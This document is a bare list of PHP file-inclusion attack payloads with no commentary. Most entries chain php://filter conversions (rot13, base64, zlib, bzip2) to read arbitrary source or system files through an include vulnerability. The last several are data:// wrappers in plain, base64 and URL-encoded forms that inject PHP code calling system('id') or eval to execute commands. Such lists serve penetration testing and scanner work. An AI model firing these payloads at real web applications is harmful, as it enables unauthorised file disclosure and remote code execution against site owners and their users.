php://filter/string.rot13/resource=* 
php://filter/string.toupper/resource=* 
php://filter/convert.base64-encode/resource=* 
php://filter/string.rot13|string.rot13/resource=*
php://filter/read=string.rot13|string.rot13/resource=*
php://filter/string.rot13|convert.base64-encode/resource=*
php://filter/convert.base64-encode|string.rot13/resource=*
php://filter/read=string.rot13|convert.base64-encode/resource=*
php://filter/read=convert.base64-encode|string.rot13/resource=*
php://filter/string.toupper|string.rot13|string.rot13/resource=*
php://filter/read=string.toupper|string.rot13|string.rot13/resource=*
php://filter/zlib.deflate/resource=*
php://filter/bzip2.compress/resource=*
php://filter/zlib.deflate|convert.base64-encode/resource=*
php://filter/bzip2.compress|convert.base64-encode/resource=*
data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
data:text/plain,<?php%20system('id');%20?>
data:text/plain,%3C%3Fphp%20system%28%27id%27%29%3B%20%3F%3E
data%3Atext%2Fplain%2C%3C%3Fphp%20system%28%27id%27%29%3B%20%3F%3E
data://text/plain,<?php%20eval(\"system('id');\");%20?>

